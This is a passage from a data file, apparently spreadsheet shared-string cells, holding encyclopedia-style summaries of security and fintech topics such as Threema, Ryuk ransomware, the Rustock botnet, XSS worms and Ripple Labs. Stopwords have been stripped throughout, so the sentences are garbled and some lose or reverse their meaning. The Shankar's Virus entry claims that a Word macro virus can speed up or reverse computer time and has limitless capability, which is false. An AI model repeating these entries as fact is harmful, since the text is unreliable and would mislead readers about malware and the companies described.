education: september 2020, threema released threema education, version messenger designed education institutions. integrates threema broadcast requires one-time payment device used. it's intended teachers, students, parents.threema onprem: july 2021, threema released threema onprem, version messenger could hosted company's servers maximum security purposes. privacy since threema's servers switzerland, subject swiss federal data protection. data center iso/iec 27001-certified. linking phone number and/or email address threema optional; checksum values (sha-256 hmac static key) email address and/or phone number sent server. small number possible digit combinations telephone number, phone number associated checksum could determined brute force. transmitted data tls-secured. address book data kept volatile memory server deleted immediately synchronizing contacts. user chooses link phone number email address threema remove phone number email address time. should user ever lose device (and private key), revoke threema revocation password set.groups solely managed users’ devices group messages sent recipient individual message, encrypted respective public key. thus, group compositions directly exposed server.data (including media files) stored users’ devices encrypted 256. android, additionally protected passphrase.since 2016, threema gmbh publishes transparency report public authority inquiries disclosed.on march 2017, threema listed "register organizers information dissemination internet" operated federal service supervision communications, information technology mass media russian federation.in response, threema spokesperson publicly stated: operate swiss neither allowed willing provide information users foreign authorities."on april 2021, threema significant case federal supreme court switzerland swiss federal department police justice, wished classify company telecommunications provider. lost case, threema would legal requirement identify users send information users enforcement.starting january 2022, swiss armed forces suggested troops threema instead whatsapp, telegram signal, citing threema swiss-based without servers united states thus subject cloud act, also promising soldiers would reimbursed cost. reception february 2014, german consumer organisation stiftung warentest evaluated several data-protection aspects threema, whatsapp, telegram, blackberry messenger line. considered security data transmission clients, services' terms use, transparency service providers, availability source code, apps' overall availability. threema rated 'non-critical' (unkritisch) relation data privacy protection, lost marks closed-source nature, though changed frontend clients since 2020.along cryptocat surespot, threema ranked first study evaluating security usability instant messaging encryption software, conducted german group june 2014.as november 2015, threema score points withdrawn outdated electronic frontier foundation's "secure messaging scorecard". received points communications encrypted transit, communications encrypted keys provider access (i.e. end-to-end encryption), making possible users independently verify correspondent's identities, past communications secure keys stolen (i.e. implementing forward secrecy), security design well-documented completed independent security audit. lost point source code open independent review (i.e. open-source, though late 2020 frontend apps open-sourced, leaving server component proprietary). also comparison instant messaging clients references external links official website introduction threema</t>
  </si>
  <si>
    <t>ThunderByte Antivirus</t>
  </si>
  <si>
    <t>thunderbyte anti-virus (tbav) early antivirus software product. created dutchman frans veldman 1988, published company, esass b.v. mainly designed dos, also versions supporting microsoft windows. tbav known fast scan speed, heuristics-based scanner, anti-vir.dat files tracking known-good file information. originally thunderbyte used dedicated card provide protection operating system even loaded. later, software-only product released, soon displaced hardware offering. distributed shareware. 1998, tbav sold norman asa, discontinued thunderbyte product. references javier gutiérrez chamorro (june 2008). "thunderbyte antivirus". javiergutierrezchamorro.com. "thunderbyte anti-virus utilities user manual". 1996. retrieved 2016-02-10 metropoli files. frans veldman. "the conclusion thunderbyte anti virus". archived original 2011-12-09. righard zwienenberg. "tbav". retrieved 2016-02-10.</t>
  </si>
  <si>
    <t>Shankar's Virus</t>
  </si>
  <si>
    <t>shankar's virus (also known w97m.marker.o) polymorphic computer virus infects microsoft word documents templates. discovered june 1999. creation virus originated program initially intended used conjunction microsoft word 1997. some sources attribute name rogers identity programmer created virus contributed creation. source contests shankar's virus existed since internet immemorial cites on/off code eighth sub-line viruses main code evidence rogers individual simply awoke dormancy. polymorphic nature code caused programmers believe virus cycles long period activity inactivity, numerous iterations cycle steadily absorbed data modern systems becoming much harder delete time. potentially virus wield limitless amount capability within system unique code even polymorphic virus. internet meme emerged 2014 shankar's virus subject matter effects virus hooks word event handler close documents order code. this virus infects documents templates document opened. makes following modifications infected documents: title: suprised subject: birthday author: category: infected keywords: birthday comments: shankar's birthday falls 25th july. don't forget wish also, opening closing word document, dialogue pops displaying string text "did wish shankar birthday?" shankar's virus also able affect computer's time, able speed reverse time restore similar system restore function) create copy remain inactive future time removed antivirus program. noted though actions visibly weaken functions microsoft word stop malfunctioning virus manipulates computer's time. should shankar's virus activated mobile device tablet (i.e. microsoft word mobile phone app) resulting code adaptation could destructive effects. also list computer viruses (s-z) references</t>
  </si>
  <si>
    <t>Rustock botnet</t>
  </si>
  <si>
    <t>rustock botnet botnet operated around 2006 march 2011. consisted computers running microsoft windows, capable sending 25,000 spam messages hour infected height activities, sent average spam messages compromised machine minute. reported estimates size vary greatly across different sources, claims botnet comprised anywhere 150,000 2,400,000 machines. size botnet increased maintained mostly self-propagation, botnet sent many malicious e-mails intended infect machines opening trojan would incorporate machine botnet.the botnet took 2008 takedown mccolo, responsible hosting botnet's command control servers. mccolo regained internet connectivity several hours, hours mbit second traffic observed, likely indicating transfer command control russia. while actions temporarily reduced global spam levels around 75%, effect last long: spam levels increased january june 2009, attributed rustock botnet.on march 2011, botnet taken initially reported coordinated effort internet service providers software vendors. revealed next take-down, called operation b107, action microsoft, u.s. federal enforcement agents, fireeye, university washington.to capture individuals involved rustock botnet, july 2011, microsoft offering monetary reward amount us$250,000 information results identification, arrest criminal conviction individual(s)." operations botnets composed infected computers used unwitting internet users. order hide presence user anti-virus software, rustock botnet employed rootkit technology. once computer infected, would seek contact command-and-control servers number addresses 2,500 domains backup domains direct zombies botnet perform various tasks sending spam executing distributed denial service (ddos) attacks. ninety-six servers operation time takedown. when sending spam botnet uses encryption around percent cases extra layer protection hide presence. whether detected not, creates additional overhead mail servers handling spam. some experts pointed extra load could negatively impact mail infrastructure internet, e-mails sent days spam. also botnet helpful worm mccolo operation: roast srizbi botnet zombie (computer science) alureon conficker gameover zeus storm botnet bagle (computer worm) zeroaccess botnet regin (malware) cyberwarfare russia zeus (malware) references</t>
  </si>
  <si>
    <t>Tapsnake</t>
  </si>
  <si>
    <t>tapsnake scareware scam involving coercion protection non-existent computer virus distributed various ways.it offered game, malware/spyware included transmitting sundry information, particularly location information unauthorized third parties. name tapsnake comes computer game snaker, revised 'snake' responds touchscreen taps user. game front trojan, spyware. unsuspecting mobile device user persuaded load "fun, free app," person wishes monitor movements must load version enables reception location reports 15-minute intervals.the recent incarnation enabled activating pop-up otherwise innocuous website. user receives dire warnings virus them, offered protection price download mobile device), promised increased speed performance additional perk. android seems operating system targeted, though attacks also threatened. actual game embedded spyware seem present scenario, except form threat. blog-advisors seem agree safest course action simply close advert, 'clicking' things possible. intent coerce defraud, instance, monitor movement. references</t>
  </si>
  <si>
    <t>Shanghai National Police Database</t>
  </si>
  <si>
    <t>shanghai national police database shga database) leaked data personal information chinese residents police cases, publicly sold unknown hacker internet price bitcoins. data allegedly leaked shanghai public security bureau, consisting multiple parts totaling terabytes, involving billion mainland chinese residents, including names, addresses, places birth, resident card numbers, phone numbers, photos, mobile phone numbers information criminal cases. screenshots circulated internet reveals data provides huge amount detailed police information, including time reporting criminals, phone number reporting person reasons reporting. preliminary analysis data samples showed personal information database came residents across mainland china, shanghai.media suggests would largest unprecedented data leak incident since 1949, amount data accurate. reported weibo, social platform mainland china, applied censorship keywords stop news spreading. authority confirm publicly respond incident. bloomberg faxed inquiries central cyberspace administration china shanghai police bureau responses received yet. bloomberg criticized data breaches within people's republic china rarely disclosed lack transparency, mentioning several data leakage incidents mainland china past years, leakage personal information communist party members 2016, leakage weibo account information 2020, information leakage xinjiang re-education camps 2022. also data breach mass surveillance china health code#surveillance invasion privacy xinjiang police files list data breaches sources</t>
  </si>
  <si>
    <t>Ripple (payment protocol)</t>
  </si>
  <si>
    <t>ripple real-time gross settlement system, currency exchange remittance network created ripple labs inc., us-based technology company. released 2012, ripple built upon distributed open source protocol, supports tokens representing fiat currency, cryptocurrency, commodities, units value frequent flier miles mobile minutes. ripple purports enable "secure, instantly nearly free global financial transactions size chargebacks". ledger employs native cryptocurrency known xrp. december 2020, ripple labs executives sued u.s. securities exchange commission (sec) selling tokens, classified unregistered securities. history ripple conceived mccaleb built arthur britto david schwartz approached ryan fugger debuted 2005 financial service provide secure payment options members online community global network. fugger developed system called opencoin would transform ripple. company also created form digital currency referred allow financial institutions transfer money negligible fees wait-time. 2013, company reported interest banks using payment system.by 2018, banks signed using ripple's xcurrent messaging technology, avoiding cryptocurrency volatility problems. representatives society worldwide interbank financial telecommunication (swift), whose market dominance challenged ripple, argued scalability issues ripple blockchain solutions remain unsolved, confining bilateral intra-bank applications. ripple executive acknowledged 2018 started classic blockchain, love. feedback banks can’t whole world blockchain."ripple relies common shared ledger, distributed database storing information ripple accounts. chris larsen told stanford graduate school business network managed network independent servers compare transaction records, servers could theory belong anyone, including banks market makers. ripple validates accounts balances instantly payment transmission delivers payment notification within seconds. payments irreversible, chargebacks.ripple labs continued primary contributors code consensus verification system behind ripple. 2014, protocol gained access banking system amid concerns security lack regulation. litigation class action filed ripple 2018 "alleging scheme raise hundreds millions dollars unregistered sales tokens". according complaint, "the company created billions coins 'out thin air' profited selling public 'what essentially never-ending initial coin offering'".the u.s. securities exchange commission (sec) initiated legal proceedings ripple labs, brad garlinghouse, co-founder chris larsen december 2020, allegedly selling unregistered securities. lawsuit, claimed security instead commodity, generated distributed ripple labs centralized fashion adopted financial institutions advertised cases. stated ripple executives sold 14.6 billion units $1.38 billion fund company's operations enrich themselves.in response, garlinghouse criticized indicated ripple labs would defend court. coinbase delisted december investor filed class action december alleging coinbase sold tokens understanding unregistered securities.on april commissioner hester peirce published token safe harbor proposal 2.0, ″intended provide initial development teams three-year time period within facilitate participation continued development functional decentralized network, exempt registration provisions federal securities laws long certain conditions met.″ reception creation development ripple protocol (rtxp) ripple payment/exchange network ripple labs named 2014's smartest companies february 2014 edition technology review. scientific study made researchers stanford stockholm university studied money production energy consumption point view macroeconomic level stated running server ripple comparable energy needs running email server. also libra (cryptocurrency) list online payment service providers list cryptocurrencies mojaloop references external links official website</t>
  </si>
  <si>
    <t>XOFTspy Portable Anti-Spyware</t>
  </si>
  <si>
    <t>xoftspy portable anti-spyware proprietary application developed paretologic inc. microsoft windows computers. anti-spyware program designed drive protect users malicious threats. while software free download scan, user must purchase license clean. license valid clean multiple computers drive.portability useful situations computer heavily infected, bogged down, sluggish. accessing computer directly device, xoftspy portable removes malware items even computer infected unable download anti-spyware programs online.xoftspy retired, product name digitalcare. also software rootkits employee monitoring software computer insecurity defensive computing references</t>
  </si>
  <si>
    <t>Yemen Cyber Army</t>
  </si>
  <si>
    <t>yemen cyber army y.c.a yemeni hacker group claimed responsibility defacement london based pro-saudi al-hayat website april 2015 well exfiltration data saudi arabia’s ministry foreign affairs subsequently listed wikileaks. associated 2015 yemeni civil war, group claims based yemen itself, speculation security experts fact iranian backed based address information persian language. experts suggest organization manifestation ongoing proxy iran saudi arabia. meanwhile, saudi-based anonymous-affiliated hackers contribute ongoing #protest saudi regime. references</t>
  </si>
  <si>
    <t>XSS worm</t>
  </si>
  <si>
    <t>worm, sometimes referred cross site scripting virus, malicious sometimes non-malicious) payload, usually written javascript, breaches browser security propagate among visitors website attempt progressively infect visitors. they first mentioned 2002 relation cross site scripting vulnerability hotmail. concept worms exploit security vulnerability known cross site scripting short) within website, infecting users variety ways depending vulnerability. such site features profiles chat systems affected worms implemented improperly without regard security. often, worms specific single site, spreading quickly exploiting specific vulnerabilities. cross-site scripting vulnerabilities commonly exploited form worms popular social commercial websites, myspace, yahoo!, orkut, justin.tv, facebook twitter. these worms used malicious intent, giving attacker basis steal personal information provided site, passwords credit card numbers. examples several worms affected popular sites. samy worm samy worm, largest known worm, infected million myspace profiles less hours. virus' author sued entered plea agreement felony charge. justin.tv worm justin.tv video casting website active user base approximately thousand users. cross-site scripting vulnerability exploited "location" profile field properly sanitized inclusion profile page. "location" profile field sanitized included title profile page within actual field page's body. this meant authors worm, order achieve stealth boost lifetime spread worm, automatically remove payload title page within worm's code, already hidden comments. after proper development worm, executed approximately saturday, 2008 21:52:33 utc, finished sun, 2008 21:12:21 utc. since social website targeted particularly active (compared popular worm targets), worm infected total 2525 profiles within roughly hours. worm found hours successfully removed, based data recorded (due worm's original intent research purposes) worm able infect uninfected profiles sanitized forcefully developers justin.tv. worm sanitized vulnerability patched, able removed easily. however, shows ability worm adapt spread even counter-attack. other particular factors indicated graphs data released attackers include social activity lack new, uninfected users periods time. orkut "bom sabado" worm orkut, social networking site, also worm. infected users receive scrap containing words "bom sabado" (portuguese, "happy saturday"). google comment situation. references also browser security internet safety internet security</t>
  </si>
  <si>
    <t>Ripple Labs</t>
  </si>
  <si>
    <t>ripple labs, inc. american technology company develops ripple payment protocol exchange network. originally named opencoin renamed 2015, company founded 2012 based francisco, california. history ryan fugger conceived ripple 2004 working local exchange trading system vancouver. intent create monetary system decentralized could effectively empower individuals communities create money. fugger later built first iteration system, ripplepay.com. concurrently, 2011, mccaleb began developing digital currency system transactions verified consensus among members network, rather mining process used bitcoin. august 2012, mccaleb hired chris larsen approached ryan fugger digital currency idea. after discussions mccaleb long-standing members ripple community, fugger handed reins. september 2012, chris larsen mccaleb co-founded corporation opencoin.opencoin began development ripple protocol (rtxp) ripple payment exchange network. april 2013, opencoin announced closed angel round funding several venture capital firms. that month, opencoin acquired simplehoney help popularize virtual currencies make easier average users.on september 2013, opencoin officially changed name ripple labs, inc.on 2015, ripple received us$700,000 (equivalent $800,239 2021) civil money penalty u.s. treasury's financial crimes enforcement network (fincen) “willful violation bank secrecy acting money services business without registering fincen.” october 2015, company rebranded ripple labs ripple.on june 2016, ripple obtained virtual currency license york state department financial services, making fourth company bitlicense.in september 2017, sued ripple specific performance option agreement ripple agreed sell five billion xrps price $.0085. ripple countersued, claiming reneged number contractual promises, simply acting spirit opportunism, cryptocurrency increased value times. september 2018, ripple reached undisclosed settlement agreement.in march 2018, japanese bank consortium ripple asia, comprising banks launched "moneytap", ripple-powered mobile provide on-demand domestic payments japan. 2018, spanish banking group santander released first mobile application international payments powered blockchain technology, uses ripple's xcurrent technology. following creation mumbai office, ripple adding multiple indian customers 2018, including leading banks kotak mahindra bank, axis bank, indusind, announced started using ripple's products.on december 2020, u.s. securities exchange commission charged ripple executives violating investor protection laws. alleged ripple, co-founder christian larsen bradley garlinghouse, raised $1.3 billion unregistered securities offering. government agency brought charges ripple fault depriving “potential purchasers xrp] adequate disclosures ripple’s business important long-standing protections fundamental robust public market system,” according complaint filed federal district court manhattan, york. april 2021, judge sarah netburn granted motion garlinghouse larsen dismiss sec's subpoenas access eight years' banking records, referring request "wholly inappropriate overreach." defendants already agreed turn data involving transactions. funding primary source funding ripple sales cryptocurrency. according records sold $1,254.54 million worth 2016 2020, institutional investors retail investors sales cryptocurrency exchanges.ripple privately funded company. closed five rounds funding, included rounds angel funding, round seed funding, series round, series round series round. ripple's revenue sources include professional services provided financial network operators integrated ripple, software built integrate legacy financial systems ripple native currency (xrp). ripple private company registered delaware) chooses reveal information public sales revenues software professional services. programs projects charitable contributions billion ripple labs gifted, ripple follows distribution strategy encompasses payments business partners gateways, market makers charitable organizations.ripple labs began working world community grid november 2013. world community grid pools surplus processing power volunteers’ computers electronic devices support humanitarian causes fighting aids, improving solar energy defeating cancer. individuals join ripple labs team donate spare processing power rewarded xrp. march 2014, ripple labs given away 134,528,800 world community grid rate 1,250,000 day.in 2018, ripple made multiple donations. company donated million public schools, million ellen degeneres wildlife fund partnerships initiatives march 2014, crosscoin ventures launched accelerator funds companies work advance ripple ecosystem. firm funds accepted startups us$50,000 (equivalent $57,232 2021) xrp, ripple's native currency, exchange stake diluted common stock. mentorship support provided crosscoin ripple labs, inc.ripple also developed early partnerships companies zipzap, relationship called threat western union press.in cooperation industry leaders, ripple labs became co-founding member digital asset transfer authority (data) july 2013. data provides best practices technical standards, including anti-money laundering compliance guidance companies work digital currency emerging payments systems. committee works liaison among public officials, businesses consumers create common rules protect consumers. initiative attempts create cohesive voice bitcoin community members interacting regulators.in june 2018, ripple committed million funding create university blockchain research initiative, aims support research collaborate research technical development stimulate widespread understanding innovation blockchain. create curriculum meet high student demand learning blockchain, cryptocurrency fintech topics. stimulate ideas dialog among students, faculty, technologists business leaders topics shared interest.in 2018, ripple announced initiative ripple invest incubate, acquire provide grants companies projects [...] digital asset ledger, open-sourced, decentralized technology behind xrp, solve customers’ problems.".in march 2019, ripple announced $100 million fund gaming developers would overseen forte. awards recognitions creation development ripple protocol (rtxp) ripple payment/exchange network, magazine technology review recognized ripple labs 2014s smartest companies february 2014 issue. criteria recognition revolved around "whether company made strides past year define field."on february 2014, ripple labs named finalist 2014 pymnts innovator award separate categories: best technology well most disruptive company. recognition pertains ripple labs work creating ripple, open-source, distributed payment protocol powering global value web.on january 2016, ripple listed uk-based company richtopia list most influential blockchain organisations.other awards: february 2015 fast company. world's most innovative companies 2015 money. february 2015 american banker. fintech companies watch. august 2015 ripple labs awarded technology pioneer world economic forum. december 2015 forbes. fintech december 2015 ventures, kpmg. fintech 100. march 2016 pymnts innovation project 2016. best innovation award. june 2016 fortune. hottest companies fintech. controversies 2015, fincen fined ripple labs us$700,000 violation bank secrecy act, based financial crimes enforcement network's anti-money laundering (aml) additions 2013. according fincen announcement: "ripple labs willfully violated several requirements bank secrecy (bsa) acting money services business (msb) selling virtual currency, known xrp, without registering fincen, failing implement maintain adequate anti-money laundering (aml) program designed protect products money launderers terrorist financiers."ripple labs agreed remedial steps ensure future compliance, included agreement transact "ripple trade" activity registered money services businesses (msb), among agreements enhancing ripple protocol. argued changes made protocol change protocol itself, instead added transaction monitoring network improve transaction analysis. however fincen statement clearly indicated ripple making changes protocol result enforcement action. "ripple labs also undertake certain enhancements ripple protocol appropriately monitor future transactions."ripple executives, including david schwartz, admitted software sold banks payments processing, xcurrent, blockchain form distributed ledger. schwartz described “bi-directional messaging” eventually plug distributed ledgers, xcurrent’s technology distributed ledger.”in 2018, stewart hosie parliamentary inquiry digital currencies, questioned ryan zagone ripple value nature cryptocurrency: "...but point made earlier, zagone, people xrp—a financial asset—from ripple labs, entitle ownership stake, right converted back conventional currencies return. also seemingly purpose. simply avoid looking like security equity, avoid necessary regulation?" ripple claims completely separate control cryptocurrency, spite fincen press release describing "its virtual currency, known xrp". however ripple controls vast majority supply and, according published records, earns majority income selling xrp. they network based pos, therefore amount determine much control network. ledger consensus algorithm entities included overlap currently published used unls, makes decentralized cryptocurrencies like bitcoin. 2018 claimed multiple occasions year "major banks" would using ripple tools made cryptocurrency 2019 "dozens" banks would using xrp. both claims 2019 proven untrue. conference june 2019, hikmet ersek, western union, commented company experimented ripple 2018 chosen adopt cryptocurrency based payments software because, “it’s five times expensive”, using existing infrastructure. 2018 2019 garlinghouse claimed multiple occasions published error rate swift messaging least shown untrue research published london school economics business review showed garlinghouse's claims based mis-reading paper published swift refer error rates messaging.in february 2020 article financial times alphaville revealed moneygram, largest public user ripple's based liquidity tools, received $50m investment prior adopting tools software provided free charge ripple moneygram receiving on-going subsidy using xrp, amounting $8.9m 2019. article revealed ripple dependent sales remain profitable. october 2020, ripple board member kurson resigned company charged committing range cyber-crimes united states attorney southern district york. references external links ripple.com</t>
  </si>
  <si>
    <t>Ryuk (ransomware)</t>
  </si>
  <si>
    <t>ryuk type ransomware known targeting large, public-entity microsoft windows cybersystems. typically encrypts data infected system, rendering data inaccessible ransom paid untraceable bitcoin. ryuk believed used criminal groups, likely russian, target organizations rather individual consumers. origin ryuk ransomware first appeared 2018. although initially suspected north korean origin, ryuk recently suspected devised russian criminal cartels. unlike many malicious computer hackers, ryuk criminal group primarily seeks extort ransom payments release data malware made useless encryption. cybersecurity threat analyst said baltimore following attack baltimore county (maryland) school system november, 2020, ryuk criminal group "tends business like done": extort large ransom payoff. works national cyber security centre notes ryuk uses trickbot computer malware install itself, access gained network's servers. capability defeat many anti-malware countermeasures present completely disable computer network. even seek disable backup files kept shared servers. emotet also used ryuk hackers gain access computers initial loader "trojan horse".the u.s. cybersecurity infrastructure security agency (cisa) website provides detailed information ryuk infects takes control computer network, saying access initially gained "... phishing campaigns contain either links malicious websites host malware attachments malware. loaders start infection chain distributing payload; deploy execute backdoor command control server install victim’s machine". phishing efforts generally contain malicious documents hyperlinks them). when victim enables malicious macro loader starts infection sequence.once ryuk takes control system, encrypts stored data, making impossible users access unless ransom paid victim untraceable bitcoin. many cases, days weeks elapse time hackers initially gain access system massive encryption occurs, criminals penetrate deeper network inflict maximum damage. ryuk especially pernicious type malware also finds encrypts network drives resources. also disables system restore feature microsoft windows would otherwise allow restoring computer's system files, applications, windows registry previous, unencrypted state.to combat ransomware attacks, u.s. cyber command initiated counter-attack september, 2020, disconnect trickbot internet servers. shortly thereafter, microsoft invoked trademark disrupt ryuk botnet. ransomware victims ryuk targets large organizations ability significant sums money regain access valuable data. told, million ransom paid ryuk malware attacks 2018–2019, according fbi. december, 2018, ryuk-based attack affected publication angeles times newspapers across country using tribune publishing software. printing fort lauderdale sentinel florida halted even newspaper's telephones work. october, 2020, information technology consulting company based paris, sopra steria, suffered ryuk ransomware attack. cybercriminals encrypted company's data using variant ryuk, making inaccessible unless ransom paid. attack cost company $47–59 million, estimated. wake attack, ryuk described "one dangerous ransomware groups operate phishing campaigns".between 2019–2020, u.s. hospitals california, york, oregon, well germany, affected ryuk malware, resulting difficulties accessing patient records even impairing critical care. doctors affected hospitals resorted writing paper instructions, instead using inoperable computers. u.s., joint statement issued october 2020, three federal government agencies, fbi, cisa, department health human services, warning hospitals anticipate 'increased imminent' wave ransomware cyberattacks could compromise patient care expose personal information", likely ryuk attacks. more dozen u.s. hospitals ryuk attacks late 2020, shutting access patient records even disrupting chemotherapy treatments cancer sufferers.also targeted vulnerable public-sector entities often using older software following best protocols computer security. lake city, florida, example, paid $460,000 ransom employees opened email containing variant ryuk malware june, 2019.the ransomware used attack dozens u.s. school systems, often deficient cybersecurity. since 2019, thousand schools victimized. sometimes resulting impairment takes weeks repair. 2020, schools havre, montana, baltimore county, maryland, experienced ryuk ransomware attacks. ransom demanded perpetrators ranged $100,000 $377,000 more. online education provider stride, inc. attacked ryuk ransomware criminals november 2020, rendering k12's records inaccessible leading threatened release students' personal information. virginia-based firm paid undisclosed ransom amount, saying, "based specific characteristics case, guidance received attack threat actor, believe payment reasonable measure take order prevent misuse information attacker obtained".the large baltimore county public schools system maryland, serving 115,000 students budget $1.5 billion, suspend classes problems experienced computer network beginning november 2020, reportedly ryuk. system's crash first manifested teachers attempting enter students' grades found locked noticed ryuk file extensions. county school officials characterized catastrophic attack technology system" said could weeks recovery complete. school system's director information technology said, “this ransomware attack encrypts data sits access remove system". prior crippling malware attack, state auditors maryland office legislative audits performed periodic audit baltimore county school system's computer network 2019. they found several vulnerabilities system, insufficient monitoring security activities, publicly accessible servers isolated school system's internal network, lack "intrusion detection untrusted traffic". rubin, technical director information security institute johns hopkins university, said auditors' discovery "computers running internal network intrusion detection capabilities" particular concern. although final report maryland office legislative audits released november 2020, auditors initially warned school system findings october, 2019.ryuk's reach global, hitting councils government agencies across globe. attack landed city onkaparinga, south australia. december 2019, ryuk virus took hold city's infrastructure. attack left hundreds employees limbo cities department worked reinstating operations. each time backups reinstated ryuk virus would start process attacking system again. attack continued four days team able contain virus reinstate necessary backups.in early 2021, strain ryuk ransomware discovered features worm-like capabilities lead self-propagating distributed devices local database infiltrating. also wizard spider group known software references</t>
  </si>
  <si>
    <t>X-Agent</t>
  </si>
  <si>
    <t>x-agent xagent spyware malware program designed collect transmit hacked files machines running windows, linux, ios, android, servers operated hackers. employs phishing attacks program designed "hop" device device. 2016, crowdstrike identified android variant malware first time, claimed malware targeted members ukrainian military distributing infected version control d-30 howitzer artillery. ukrainian army denied crowdstrike's report stated losses howitzer artillery pieces "nothing stated cause".slovak computer security company eset obtained x-agent source code 2015 described inner workings report released october 2016.a washington, grand jury indictment (resulting robert mueller's investigation russian election interference) charges agents russian moscow "developed, customized monitored x-agent malware used hack dccc [democratic congressional campaign committee] [democratic national committee] networks beginning around april 2016" (item page beginning page references</t>
  </si>
  <si>
    <t>World of Hell</t>
  </si>
  <si>
    <t>world hell simply woh) grey computer hacker group claims responsible several high-profile attacks year 2001. gained attention high-profile targets lighthearted messages posted aftermath attacks. overview world hell first emerged march 2001, successfully attacked websites several major corporations. specializes finding websites poor security, defacing advice message. used well-known zero exploits period time. group used motto "kiss 0wn3d yours" several cases vandalism also used humorous pictures aimed war, corruption, hackers.world hell also involved cyberwarfare "project-china". members cowhead2000, rafa, fone_tone, foney, no|d, dawgyg, messiah-x, azap, rubix, goof-athon, delta-x, d1ckw33d, peco, joegoel, divine, x[beast]x, apocalypse, gl0b4l, spyr0cker.s supposed attacks defense information systems agency, rolex, foia cia, pfizer, hard rock cafe, virginia state, microsoft, around sites minute, etc. convictions 2001 robert junior cowhead2000 arrested. june 2002 thomas devoss dawgyg arrested. 2005 rafael núñez rafa arrested. fate members currently unknown. references external links middleton, james 2001). "over websites defaced minutes". v3.co.uk. archived original 2012-03-30.{{cite web}}: maint: unfit (link) middleton, james 2001). "hacking group spills beans". v3.co.uk. archived original 2012-03-30.{{cite web}}: maint: unfit (link) peter gothard (2019-12-16). "dtexpo: know can't hack bank, hack person," says ethical hacker". computing. archived original 2019-10-10.{{cite web}}: maint: unfit (link) lemos, robert (2005-04-11). "campaign seeks defang rafa's hacker image". securityfocus.com. archived original 2021-02-04.{{cite web}}: maint: unfit (link) verton april 2002). hacker diaries: confessions teenage hackers. isbn 9780072223644.</t>
  </si>
  <si>
    <t>Russian Anonymous Marketplace</t>
  </si>
  <si>
    <t>russian anonymous marketplace ramp russian language forum users selling variety drugs dark web. with 14,000 members, site uses uses escrow features like silk road-like darknet markets, otherwise many deals take place off-site using off-the-record messaging. longest lived darknet market, running september 2012 july 2017, inspired success silk road.the administrator goes handle 'darkside', claims site makes around $250,000 year avoids enforcement attention predominant russian user base sale goods services hacking.from july 2017, users unable login ddos attacks. september 19th 2017, russian ministry internal affairs confirmed site terminated july. references</t>
  </si>
  <si>
    <t>Ticket Granting Ticket</t>
  </si>
  <si>
    <t>computer security systems, ticket granting ticket ticket tickets (tgt) small, encrypted identification file limited validity period. after authentication, file granted user data traffic protection distribution center (kdc) subsystem authentication services kerberos. file contains session key, expiration date, user's address, protects user man-in-the-middle attacks. used obtain service ticket ticket granting service (tgs). user granted access network services service ticket provided.</t>
  </si>
  <si>
    <t>Sign in with Apple</t>
  </si>
  <si>
    <t>sign apple single sign-on provider operated apple inc., introduced june 2019 apple's 2019 worldwide developers conference (wwdc) 13.it designed allow users create accounts third-party services minimal amount personal information opposed login services offered social networking service platforms facebook, features also grant third-party service access personal information tied account), requiring user provide name email address. users email address associated apple choose "hide email" option generate disposable email address specific service; addresses privaterelay.appleid.com domain. messages sent disposable relay) email address automatically forwarded verified email address user's choice, function also disabled needed. service compatible oauth openid connect standards, integrates face touch ios, ipados, macos. usage software development september 2019, apple updated store review guidelines stipulate developers whose apps least third-party login service must implement sign apple, exceptions apps function exclusively client specific service (such twitter app), login service backed citizen identification system, developed work exclusively company's first-party login service. apple's human interface guidelines require sign apple buttons less prominent sign-in services, appear "above fold" without user scroll.for outside apps, apple also offers javascript library implement sign apple android web. compliance openid standard october 2019, apple made service compliant openid connect authentication standard. previously fully compliant, example excluded "proof code exchange" (pkce)—whose absence exposed users possible replay attacks code injection vulnerabilities. references</t>
  </si>
  <si>
    <t>Russian Business Network</t>
  </si>
  <si>
    <t>russian business network (commonly abbreviated rbn) multi-faceted cybercrime organization, specializing cases monopolizing personal identity theft resale. originator mpack alleged operator defunct storm botnet.the rbn, notorious hosting illegal dubious businesses, originated internet service provider child pornography, phishing, spam, malware distribution physically based petersburg, russia. 2007, developed partner affiliate marketing techniques many countries provide method organized crime target victims internationally. activities according internet security company verisign, registered internet site 2006. initially, much activity legitimate. apparently founders soon discovered profitable host illegitimate activities started hiring services criminals.the described verisign "the baddest bad". offers hosting services internet access wide range criminal objectionable activities, individual activities earning $150 million year. businesses take active stands attacks sometimes targeted denial service attacks originating network. known sell services operations $600 month.the business difficult trace. registered company, domains registered anonymous addresses. owners known nicknames. advertise, trades untraceable electronic transactions.one increasingly known activity delivery exploits fake anti-spyware anti-malware, purposes hijacking personal identity theft. mcafee siteadvisor tested “bad” downloads malwarealarm.com, mentioned dancho danchev referenced article, found malwarealarm update fake anti-spyware malware wiper. user enticed “free download” test spyware malware malwarealarm displays warning message problems persuade unwary site visitor purchase paid version. addition malwarealarm, numerous instances rogue software linked hosted rbn.according since closed spamhaus report, “among world's worst spammer, malware, phishing cybercrime hosting networks. provides 'bulletproof hosting', probably involved crime too”. another spamhaus report states, "endless russian/ukrainian funded cybercrime hosting network]." october 2007, subject washington post article, symantec security firms claim provides hosting many illegal activities, including identity theft phishing. routing operations operates operated) numerous internet service provider (isp) networks worldwide resides (resided) specific addresses, spamhaus blocklist reports. political connections alleged rbn's leader creator, 24-year-old known flyman, nephew powerful well-connected russian politician. flyman alleged turned towards criminal users. light this, entirely possible past cyber-terrorism activities, denial service attacks georgia azerbaijan august 2008, co-ordinated out-sourced organization. although currently unproven, intelligence estimates suggest case. also list spammers russian mafia cyberwarfare russia references external links spamhaus rokso listing description activities study bizeul shadowserver rbusiness network as40898 clarifying guesswork criminal activity</t>
  </si>
  <si>
    <t>Simple file verification</t>
  </si>
  <si>
    <t>simple file verification (sfv) file format storing crc32 checksums files verify integrity files. used verify file corrupted, otherwise verify file's authenticity. .sfv file extension usually used files. checksum files become corrupted variety reasons, including faulty storage media, errors transmission, write errors copying moving, software bugs. verification ensures file corrupted comparing file's hash value previously calculated value. nature hash functions, hash collisions result false positives, likelihood collisions usually negligible random corruption. (the number possible checksums limited though large, checksum scheme many files checksum. however, probability corrupted file checksum original exceedingly small, unless deliberately constructed maintain checksum.) cannot used verify authenticity files, crc32 collision resistant hash function; even hash file tampered with, computationally trivial attacker cause deliberate hash collisions, meaning malicious change file detected hash comparison. cryptography, attack called collision attack. reason, md5sum sha1sum utilities often preferred unix operating systems, sha-1 cryptographic hash functions respectively. even single-bit error causes sfv's md5sum's cryptographic hash fail, requiring entire file re-fetched. parchive rsync utilities often preferred verifying file accidentally corrupted transmission, since correct common small errors much shorter download. despite weaknesses format, popular relatively small amount time taken utilities calculate crc32 checksums compared time taken 